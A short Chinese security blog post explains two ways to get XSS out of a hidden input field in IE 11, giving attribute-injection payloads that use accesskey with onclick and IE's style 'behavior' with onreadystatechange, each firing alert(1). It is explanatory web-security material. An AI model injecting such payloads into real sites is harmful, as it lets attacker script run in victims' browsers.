XSS:IE下绕过hidden的input

  • A+
所属分类:安全博客

0x00

对于<input type="hidden" name="test" value="">这种类型的绕过,大致有两种。一种是通过accesskey快捷键触发,而另外一种就是IE下的无交互绕过了。
影响版本: IE 11

0x01 accesskey触发

Payload:

1" accesskey="J" onclick=alert(1)

这里要注意的是不能存在快捷键冲突,所以要多试几个快捷键。

0x02 IE下behaivor绕过

Payload:

" style="behavior:url(?)" onreadystatechange="alert(1)"

在这里,IE的style有个特有的属性behavior,在这里通过url请求一个网址。在这里我们设置为或者@等都可以触发后面的eventonreadystatechange

0x04 参考

hiddenなinput要素でユーザー操作を使わずにXSS

FROM :rickyhao.com | rickyhao.com

相关推荐: 阿里云配置CDN加速博客

博客的图床已经配置了七牛云HTTPS 具体配置看上篇文章: MacOS下重建Hexo博客2.0全记录 阿里云CDN加速和全站加速DCDN的区别阿里云有两种加速方式,CDN加速和全站加速DCDN。前者也叫静态加速,后者叫动态加速。 什么是阿里云CDN阿里云内容分…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: